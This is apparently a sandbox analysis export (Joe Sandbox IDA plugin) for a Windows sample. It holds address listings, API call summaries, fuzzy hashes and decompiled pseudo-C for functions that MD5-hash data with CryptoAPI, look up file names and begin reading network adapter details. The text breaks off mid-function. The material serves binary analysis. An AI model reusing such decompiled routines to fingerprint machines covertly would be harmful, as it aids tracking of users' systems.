                                                                                                    0x0040ff97
                                                                                                    0x00000000
                                                                                                    0x0040ff93
                                                                                                    0x0040ff93
                                                                                                    0x00000000
                                                                                                    0x0040ff93
                                                                                                    0x0040ff15
                                                                                                    0x00000000
                                                                                                    0x0040ff15
                                                                                                    0x0040fede
                                                                                                    0x0040fe00
                                                                                                    0x0040fe05
                                                                                                    0x0040fe08
                                                                                                    0x0040fe15
                                                                                                    0x0040fe19
                                                                                                    0x0040fe20
                                                                                                    0x0040fe2a
                                                                                                    0x0040fe34
                                                                                                    0x0040fe3b
                                                                                                    0x0040fe44
                                                                                                    0x0040fe4f
                                                                                                    0x0040fe5e
                                                                                                    0x0040fe65
                                                                                                    0x0040fe71
                                                                                                    0x0040fe79
                                                                                                    0x0040fe7e
                                                                                                    0x0040fe7e
                                                                                                    0x0040fe83
                                                                                                    0x0040fe8e
                                                                                                    0x0040fe98
                                                                                                    0x0040fea2
                                                                                                    0x0040fea9
                                                                                                    0x0040feb5
                                                                                                    0x0040feba
                                                                                                    0x0040feba
                                                                                                    0x00000000
                                                                                                    0x0040fea9
                                                                                                    0x0040fdbd
                                                                                                    0x0040fdc1
                                                                                                    0x0040fdc5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040fdc7
                                                                                                    0x0040fdca
                                                                                                    0x0040fdd0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040fdd0
                                                                                                    0x0040fdd6
                                                                                                    0x0040fdd8
                                                                                                    0x00000000
                                                                                                    0x0040fdd8
                                                                                                    0x0040fd7d
                                                                                                    0x0040fd81
                                                                                                    0x0040fd85
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040fd87
                                                                                                    0x0040fd8a
                                                                                                    0x0040fd90
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040fd90
                                                                                                    0x0040fd96
                                                                                                    0x0040fd98
                                                                                                    0x00000000
                                                                                                    0x00410052
                                                                                                    0x0041005a
                                                                                                    0x00410060
                                                                                                    0x00410063
                                                                                                    0x0041006c
                                                                                                    0x00000000
                                                                                                    0x0041006c
                                                                                                    0x0040fd4c
                                                                                                    0x0040fb31
                                                                                                    0x0040fb36
                                                                                                    0x0040fb38
                                                                                                    0x0040fb3a
                                                                                                    0x0040fb41
                                                                                                    0x0040fb49
                                                                                                    0x0040fb50
                                                                                                    0x0040fb55
                                                                                                    0x0040fb5a
                                                                                                    0x0040fb5f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040fb65
                                                                                                    0x0040fb70
                                                                                                    0x0040fb81
                                                                                                    0x0040fb86
                                                                                                    0x0040fb8a
                                                                                                    0x0040fb8c
                                                                                                    0x0040fb8f
                                                                                                    0x0040fb94
                                                                                                    0x0040fbbb
                                                                                                    0x0040fbbb
                                                                                                    0x0040fbc0
                                                                                                    0x0040fbc5
                                                                                                    0x0040fbcf
                                                                                                    0x0040fbd1
                                                                                                    0x0040fbd1
                                                                                                    0x0040fbd5
                                                                                                    0x0040fbdb
                                                                                                    0x0040fbe0
                                                                                                    0x0040fbed
                                                                                                    0x0040fbf5
                                                                                                    0x0040fbf9
                                                                                                    0x0040fc02
                                                                                                    0x0040fc07
                                                                                                    0x0040fc0c
                                                                                                    0x0040fc0c
                                                                                                    0x0040fc0f
                                                                                                    0x0040fc14
                                                                                                    0x0040fc1b
                                                                                                    0x0040fc22
                                                                                                    0x0040fc29
                                                                                                    0x0040fc4c
                                                                                                    0x0040fc2b
                                                                                                    0x0040fc2e
                                                                                                    0x0040fc2f
                                                                                                    0x0040fc3c
                                                                                                    0x0040fc41
                                                                                                    0x0040fc44
                                                                                                    0x0040fc44
                                                                                                    0x0040fc2f
                                                                                                    0x0040fc55
                                                                                                    0x0040fc5b
                                                                                                    0x0040fc60
                                                                                                    0x0040fc6b
                                                                                                    0x0040fc72
                                                                                                    0x0040fc77
                                                                                                    0x0040fc7d
                                                                                                    0x0040fc84
                                                                                                    0x0040fc86
                                                                                                    0x0040fc88
                                                                                                    0x0040fc88
                                                                                                    0x0040fc8c
                                                                                                    0x0040fc99
                                                                                                    0x0040fc9f
                                                                                                    0x0040fca1
                                                                                                    0x0040fca1
                                                                                                    0x0040fca5
                                                                                                    0x0040fcab
                                                                                                    0x0040fcb0
                                                                                                    0x0040fcb2
                                                                                                    0x0040fcb4
                                                                                                    0x0040fcbb
                                                                                                    0x0040fcc3
                                                                                                    0x0040fcca
                                                                                                    0x0040fcd1
                                                                                                    0x0040fcd7
                                                                                                    0x0040fcdc
                                                                                                    0x0040fcdc
                                                                                                    0x0040fcdf
                                                                                                    0x0040fce5
                                                                                                    0x0040fce8
                                                                                                    0x0040fced
                                                                                                    0x0040fced
                                                                                                    0x00000000
                                                                                                    0x0040fce5
                                                                                                    0x0040fba0
                                                                                                    0x0040fba7
                                                                                                    0x0040fbaf
                                                                                                    0x0040fbb3
                                                                                                    0x0040fbb4
                                                                                                    0x0040fbb7
                                                                                                    0x00000000
                                                                                                    0x0040fba0
                                                                                                    0x0040f789
                                                                                                    0x0040f789
                                                                                                    0x0040f790
                                                                                                    0x0040f792
                                                                                                    0x0040f799
                                                                                                    0x0040f79c
                                                                                                    0x0040f7a6
                                                                                                    0x0040f7ae
                                                                                                    0x0040f7b3
                                                                                                    0x0040f7bc
                                                                                                    0x0040f7bf
                                                                                                    0x0040f7ca
                                                                                                    0x0040f7d2
                                                                                                    0x0040f7d9
                                                                                                    0x0040f7de
                                                                                                    0x0040f7e2
                                                                                                    0x0040f7e8
                                                                                                    0x0040f870
                                                                                                    0x0040f874
                                                                                                    0x0040f879
                                                                                                    0x0040f87e
                                                                                                    0x0040f87e
                                                                                                    0x0040f883
                                                                                                    0x0040f88a
                                                                                                    0x0040f891
                                                                                                    0x0040f898
                                                                                                    0x0040f89c
                                                                                                    0x0040f8a1
                                                                                                    0x0040f8a6
                                                                                                    0x0040f8a6
                                                                                                    0x00000000
                                                                                                    0x0040f89c
                                                                                                    0x0040f7ee
                                                                                                    0x0040f7f4
                                                                                                    0x00000000
                                                                                                    0x0040f7f6
                                                                                                    0x0040f7fd
                                                                                                    0x0040f807
                                                                                                    0x0040f809
                                                                                                    0x0040f813
                                                                                                    0x0040f818
                                                                                                    0x0040f818
                                                                                                    0x0040f821
                                                                                                    0x0040f827
                                                                                                    0x0040f830
                                                                                                    0x0040f832
                                                                                                    0x0040f83c
                                                                                                    0x0040f844
                                                                                                    0x0040f844
                                                                                                    0x0040f850
                                                                                                    0x0040f858
                                                                                                    0x0040f85d
                                                                                                    0x0040f862
                                                                                                    0x0040f867
                                                                                                    0x0040f92b
                                                                                                    0x0040f930
                                                                                                    0x0040f935
                                                                                                    0x0040f935
                                                                                                    0x0040f938
                                                                                                    0x0040f93a
                                                                                                    0x0040f945
                                                                                                    0x0040f94c
                                                                                                    0x0040f950
                                                                                                    0x0040f959
                                                                                                    0x0040f95e
                                                                                                    0x0040f95e
                                                                                                    0x004100ea
                                                                                                    0x004100ee
                                                                                                    0x004100f3
                                                                                                    0x004100f8
                                                                                                    0x00410100
                                                                                                    0x0041010b
                                                                                                    0x0040f86d
                                                                                                    0x0040f86d
                                                                                                    0x00000000
                                                                                                    0x0040f86d
                                                                                                    0x0040f867
                                                                                                    0x0040f8a9
                                                                                                    0x0040f8a9
                                                                                                    0x0040f8aa
                                                                                                    0x0040f8ad
                                                                                                    0x00000000
                                                                                                    0x0040f790

                                                                                                    APIs
                                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
                                                                                                      • Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
                                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE
                                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                                    • _memmove.LIBCMT ref: 0040F9EA
                                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                    • _memmove.LIBCMT ref: 0040FADA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                    • String ID:
                                                                                                    • API String ID: 273148273-0
                                                                                                    • Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                                    • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                    • Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                                    • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 49%
                                                                                                    			E0040E870(void* __ecx, void* __eflags, char _a4, intOrPtr _a20, intOrPtr _a24) {
                                                                                                    				int _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				intOrPtr _v20;
                                                                                                    				int _v24;
                                                                                                    				int _v28;
                                                                                                    				long* _v32;
                                                                                                    				int _v36;
                                                                                                    				char _v40;
                                                                                                    				char _v44;
                                                                                                    				char _v48;
                                                                                                    				char _v52;
                                                                                                    				char _v56;
                                                                                                    				char _v72;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				long** _t48;
                                                                                                    				int* _t49;
                                                                                                    				char _t51;
                                                                                                    				char _t53;
                                                                                                    				char _t59;
                                                                                                    				intOrPtr _t67;
                                                                                                    				void* _t82;
                                                                                                    				void* _t83;
                                                                                                    				intOrPtr* _t89;
                                                                                                    				void* _t94;
                                                                                                    				void* _t95;
                                                                                                    				int _t96;
                                                                                                    				void* _t98;
                                                                                                    				intOrPtr* _t99;
                                                                                                    				void* _t100;
                                                                                                    				intOrPtr _t102;
                                                                                                    				intOrPtr _t103;
                                                                                                    				void* _t105;
                                                                                                    
                                                                                                    				 *[fs:0x0] = _t102;
                                                                                                    				_t103 = _t102 - 0x38;
                                                                                                    				_v20 = _t103;
                                                                                                    				_t83 = __ecx;
                                                                                                    				_v8 = 0;
                                                                                                    				_v32 = 0;
                                                                                                    				_v24 = 0;
                                                                                                    				_v36 = 0;
                                                                                                    				E004156D0(__ecx, __ecx, _t95, 0x4ffca4);
                                                                                                    				_t48 =  &_v32;
                                                                                                    				_v8 = 1;
                                                                                                    				__imp__CryptAcquireContextW(_t48, 0, 0, 1, 0xf0000000, 0, _t95, _t98, _t82,  *[fs:0x0], 0x4ca9e8, 0xffffffff);
                                                                                                    				if(_t48 == 0) {
                                                                                                    					_v40 = _t48;
                                                                                                    					E00430ECA( &_v40, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t49 =  &_v24;
                                                                                                    				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t49);
                                                                                                    				if(_t49 == 0) {
                                                                                                    					_v44 = _t49;
                                                                                                    					E00430ECA( &_v44, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t51 =  >=  ? _a4 :  &_a4;
                                                                                                    				__imp__CryptHashData(_v24, _t51, _a20, 0);
                                                                                                    				if(_t51 == 0) {
                                                                                                    					_v48 = _t51;
                                                                                                    					E00430ECA( &_v48, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t99 = __imp__CryptGetHashParam;
                                                                                                    				_v28 = 0;
                                                                                                    				_t53 =  *_t99(_v24, 2, 0,  &_v28, 0);
                                                                                                    				_t113 = _t53;
                                                                                                    				if(_t53 == 0) {
                                                                                                    					_v52 = _t53;
                                                                                                    					E00430ECA( &_v52, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t96 = E00420BE4(_t83, _t95, _t113, _v28 + 1);
                                                                                                    				_v36 = _t96;
                                                                                                    				E0042B420(_t96, 0, _v28 + 1);
                                                                                                    				_t105 = _t103 + 0x10;
                                                                                                    				_t59 =  *_t99(_v24, 2, _t96,  &_v28, 0);
                                                                                                    				if(_t59 == 0) {
                                                                                                    					_v56 = _t59;
                                                                                                    					E00430ECA( &_v56, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t100 = 0;
                                                                                                    				while(_t100 < _v28) {
                                                                                                    					E004204A6( &_v72, "%.2X",  *(_t100 + _t96) & 0x000000ff);
                                                                                                    					_t105 = _t105 + 0xc;
                                                                                                    					if(_v72 != 0) {
                                                                                                    						_t89 =  &_v72;
                                                                                                    						_t39 = _t89 + 1; // 0x1
                                                                                                    						_t94 = _t39;
                                                                                                    						do {
                                                                                                    							_t67 =  *_t89;
                                                                                                    							_t89 = _t89 + 1;
                                                                                                    							__eflags = _t67;
                                                                                                    						} while (_t67 != 0);
                                                                                                    						_push(_t89 - _t94);
                                                                                                    						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
                                                                                                    						_t100 = _t100 + 1;
                                                                                                    					} else {
                                                                                                    						_push(0);
                                                                                                    						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
                                                                                                    						_t100 = _t100 + 1;
                                                                                                    					}
                                                                                                    					L20:
                                                                                                    				}
                                                                                                    				E00422110(_t96);
                                                                                                    				__imp__CryptDestroyHash(_v24);
                                                                                                    				CryptReleaseContext(_v32, 0);
                                                                                                    				__eflags = _a24 - 0x10;
                                                                                                    				if(_a24 >= 0x10) {
                                                                                                    					L00422587(_a4);
                                                                                                    				}
                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                    				return 1;
                                                                                                    				goto L20;
                                                                                                    			}





































                                                                                                    0x0040e881
                                                                                                    0x0040e888
                                                                                                    0x0040e88e
                                                                                                    0x0040e891
                                                                                                    0x0040e895
                                                                                                    0x0040e8a1
                                                                                                    0x0040e8a8
                                                                                                    0x0040e8af
                                                                                                    0x0040e8b6
                                                                                                    0x0040e8c6
                                                                                                    0x0040e8c9
                                                                                                    0x0040e8ce
                                                                                                    0x0040e8d6
                                                                                                    0x0040e8d8
                                                                                                    0x0040e8e4
                                                                                                    0x0040e8e4
                                                                                                    0x0040e8e9
                                                                                                    0x0040e8f9
                                                                                                    0x0040e901
                                                                                                    0x0040e903
                                                                                                    0x0040e90f
                                                                                                    0x0040e90f
                                                                                                    0x0040e920
                                                                                                    0x0040e928
                                                                                                    0x0040e930
                                                                                                    0x0040e932
                                                                                                    0x0040e93e
                                                                                                    0x0040e93e
                                                                                                    0x0040e943
                                                                                                    0x0040e956
                                                                                                    0x0040e95d
                                                                                                    0x0040e95f
                                                                                                    0x0040e961
                                                                                                    0x0040e963
                                                                                                    0x0040e96f
                                                                                                    0x0040e96f
                                                                                                    0x0040e985
                                                                                                    0x0040e987
                                                                                                    0x0040e98e
                                                                                                    0x0040e993
                                                                                                    0x0040e9a2
                                                                                                    0x0040e9a6
                                                                                                    0x0040e9a8
                                                                                                    0x0040e9b4
                                                                                                    0x0040e9b4
                                                                                                    0x0040e9b9
                                                                                                    0x0040e9c0
                                                                                                    0x0040e9d3
                                                                                                    0x0040e9d8
                                                                                                    0x0040e9df
                                                                                                    0x0040e9f2
                                                                                                    0x0040e9f5
                                                                                                    0x0040e9f5
                                                                                                    0x0040e9f8
                                                                                                    0x0040e9f8
                                                                                                    0x0040e9fa
                                                                                                    0x0040e9fb
                                                                                                    0x0040e9fb
                                                                                                    0x0040ea04
                                                                                                    0x0040ea08
                                                                                                    0x0040ea0d
                                                                                                    0x0040e9e1
                                                                                                    0x0040e9e6
                                                                                                    0x0040e9ea
                                                                                                    0x0040e9ef
                                                                                                    0x0040e9ef
                                                                                                    0x00000000
                                                                                                    0x0040e9df
                                                                                                    0x0040ea11
                                                                                                    0x0040ea1c
                                                                                                    0x0040ea27
                                                                                                    0x0040ea2d
                                                                                                    0x0040ea31
                                                                                                    0x0040ea36
                                                                                                    0x0040ea3b
                                                                                                    0x0040ea43
                                                                                                    0x0040ea50
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                    • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                    • _memset.LIBCMT ref: 0040E98E
                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                    • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                    • String ID: %.2X
                                                                                                    • API String ID: 1084002244-213608013
                                                                                                    • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                    • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                    • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                    • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 47%
                                                                                                    			E0040EAA0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                    				int _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				intOrPtr _v20;
                                                                                                    				int _v24;
                                                                                                    				int _v28;
                                                                                                    				long* _v32;
                                                                                                    				int _v36;
                                                                                                    				char _v40;
                                                                                                    				char _v44;
                                                                                                    				char _v48;
                                                                                                    				char _v52;
                                                                                                    				char _v56;
                                                                                                    				char _v72;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				long** _t42;
                                                                                                    				int* _t43;
                                                                                                    				char _t45;
                                                                                                    				char _t51;
                                                                                                    				intOrPtr _t58;
                                                                                                    				void* _t72;
                                                                                                    				intOrPtr* _t80;
                                                                                                    				void* _t86;
                                                                                                    				void* _t87;
                                                                                                    				void* _t88;
                                                                                                    				int _t89;
                                                                                                    				void* _t91;
                                                                                                    				void* _t92;
                                                                                                    				intOrPtr* _t93;
                                                                                                    				void* _t94;
                                                                                                    				intOrPtr _t96;
                                                                                                    				intOrPtr _t97;
                                                                                                    				void* _t99;
                                                                                                    
                                                                                                    				 *[fs:0x0] = _t96;
                                                                                                    				_t97 = _t96 - 0x38;
                                                                                                    				_t73 = _a4;
                                                                                                    				_v20 = _t97;
                                                                                                    				_t88 = __ecx;
                                                                                                    				_v32 = 0;
                                                                                                    				_t92 = __edx;
                                                                                                    				_v24 = 0;
                                                                                                    				_v36 = 0;
                                                                                                    				E004156D0(_a4, _t73, __ecx, 0x4ffca4);
                                                                                                    				_t42 =  &_v32;
                                                                                                    				_v8 = 0;
                                                                                                    				__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000, 0, _t87, _t91, _t72,  *[fs:0x0], 0x4caa00, 0xffffffff);
                                                                                                    				if(_t42 == 0) {
                                                                                                    					_v40 = _t42;
                                                                                                    					E00430ECA( &_v40, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t43 =  &_v24;
                                                                                                    				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t43);
                                                                                                    				if(_t43 == 0) {
                                                                                                    					_v44 = _t43;
                                                                                                    					_t43 = E00430ECA( &_v44, 0x5085b8);
                                                                                                    				}
                                                                                                    				__imp__CryptHashData(_v24, _t88, _t92, 0);
                                                                                                    				if(_t43 == 0) {
                                                                                                    					_v48 = _t43;
                                                                                                    					E00430ECA( &_v48, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t93 = __imp__CryptGetHashParam;
                                                                                                    				_v28 = 0;
                                                                                                    				_t45 =  *_t93(_v24, 2, 0,  &_v28, 0);
                                                                                                    				_t105 = _t45;
                                                                                                    				if(_t45 == 0) {
                                                                                                    					_v52 = _t45;
                                                                                                    					E00430ECA( &_v52, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t89 = E00420BE4(_t73, _t88, _t105, _v28 + 1);
                                                                                                    				_v36 = _t89;
                                                                                                    				E0042B420(_t89, 0, _v28 + 1);
                                                                                                    				_t99 = _t97 + 0x10;
                                                                                                    				_t51 =  *_t93(_v24, 2, _t89,  &_v28, 0);
                                                                                                    				if(_t51 == 0) {
                                                                                                    					_v56 = _t51;
                                                                                                    					E00430ECA( &_v56, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t94 = 0;
                                                                                                    				while(_t94 < _v28) {
                                                                                                    					E004204A6( &_v72, "%.2X",  *(_t94 + _t89) & 0x000000ff);
                                                                                                    					_t99 = _t99 + 0xc;
                                                                                                    					if(_v72 != 0) {
                                                                                                    						_t80 =  &_v72;
                                                                                                    						_t35 = _t80 + 1; // 0x1
                                                                                                    						_t86 = _t35;
                                                                                                    						do {
                                                                                                    							_t58 =  *_t80;
                                                                                                    							_t80 = _t80 + 1;
                                                                                                    							__eflags = _t58;
                                                                                                    						} while (_t58 != 0);
                                                                                                    						_push(_t80 - _t86);
                                                                                                    						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
                                                                                                    						_t94 = _t94 + 1;
                                                                                                    					} else {
                                                                                                    						_push(0);
                                                                                                    						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
                                                                                                    						_t94 = _t94 + 1;
                                                                                                    					}
                                                                                                    					L18:
                                                                                                    				}
                                                                                                    				E00422110(_t89);
                                                                                                    				__imp__CryptDestroyHash(_v24);
                                                                                                    				CryptReleaseContext(_v32, 0);
                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                    				return 1;
                                                                                                    				goto L18;
                                                                                                    			}





































                                                                                                    0x0040eab1
                                                                                                    0x0040eab8
                                                                                                    0x0040eabc
                                                                                                    0x0040eac1
                                                                                                    0x0040eac4
                                                                                                    0x0040eacf
                                                                                                    0x0040ead6
                                                                                                    0x0040ead8
                                                                                                    0x0040eadf
                                                                                                    0x0040eae6
                                                                                                    0x0040eaf6
                                                                                                    0x0040eaf9
                                                                                                    0x0040eb01
                                                                                                    0x0040eb09
                                                                                                    0x0040eb0b
                                                                                                    0x0040eb17
                                                                                                    0x0040eb17
                                                                                                    0x0040eb1c
                                                                                                    0x0040eb2c
                                                                                                    0x0040eb34
                                                                                                    0x0040eb36
                                                                                                    0x0040eb42
                                                                                                    0x0040eb42
                                                                                                    0x0040eb4e
                                                                                                    0x0040eb56
                                                                                                    0x0040eb58
                                                                                                    0x0040eb64
                                                                                                    0x0040eb64
                                                                                                    0x0040eb69
                                                                                                    0x0040eb7c
                                                                                                    0x0040eb83
                                                                                                    0x0040eb85
                                                                                                    0x0040eb87
                                                                                                    0x0040eb89
                                                                                                    0x0040eb95
                                                                                                    0x0040eb95
                                                                                                    0x0040ebab
                                                                                                    0x0040ebad
                                                                                                    0x0040ebb4
                                                                                                    0x0040ebb9
                                                                                                    0x0040ebc8
                                                                                                    0x0040ebcc
                                                                                                    0x0040ebce
                                                                                                    0x0040ebda
                                                                                                    0x0040ebda
                                                                                                    0x0040ebdf
                                                                                                    0x0040ebe1
                                                                                                    0x0040ebf4
                                                                                                    0x0040ebf9
                                                                                                    0x0040ec00
                                                                                                    0x0040ec13
                                                                                                    0x0040ec16
                                                                                                    0x0040ec16
                                                                                                    0x0040ec20
                                                                                                    0x0040ec20
                                                                                                    0x0040ec22
                                                                                                    0x0040ec23
                                                                                                    0x0040ec23
                                                                                                    0x0040ec2c
                                                                                                    0x0040ec30
                                                                                                    0x0040ec35
                                                                                                    0x0040ec02
                                                                                                    0x0040ec07
                                                                                                    0x0040ec0b
                                                                                                    0x0040ec10
                                                                                                    0x0040ec10
                                                                                                    0x00000000
                                                                                                    0x0040ec00
                                                                                                    0x0040ec39
                                                                                                    0x0040ec44
                                                                                                    0x0040ec4f
                                                                                                    0x0040ec5a
                                                                                                    0x0040ec67
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                    • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                    • _memset.LIBCMT ref: 0040EBB4
                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                    • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                    • String ID: %.2X
                                                                                                    • API String ID: 1637485200-213608013
                                                                                                    • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                    • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                    • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                    • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 50%
                                                                                                    			E0040E670(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                    				char _v8;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				char* _t14;
                                                                                                    				char* _t15;
                                                                                                    				void* _t35;
                                                                                                    				void* _t36;
                                                                                                    				void* _t37;
                                                                                                    				char* _t41;
                                                                                                    				void* _t44;
                                                                                                    				void* _t45;
                                                                                                    
                                                                                                    				_t33 = __ebx;
                                                                                                    				_push(_t36);
                                                                                                    				_v8 = 0x288;
                                                                                                    				_t37 = E00420C62(__ebx, _t35, _t36, 0x12);
                                                                                                    				_t41 = E00420C62(__ebx, _t35, _t37, 0x288);
                                                                                                    				_t45 = _t44 + 8;
                                                                                                    				_t49 = _t41;
                                                                                                    				if(_t41 != 0) {
                                                                                                    					_t14 =  &_v8;
                                                                                                    					__imp__GetAdaptersInfo(_t41, _t14);
                                                                                                    					__eflags = _t14 - 0x6f;
                                                                                                    					if(_t14 != 0x6f) {
                                                                                                    						L4:
                                                                                                    						_t15 =  &_v8;
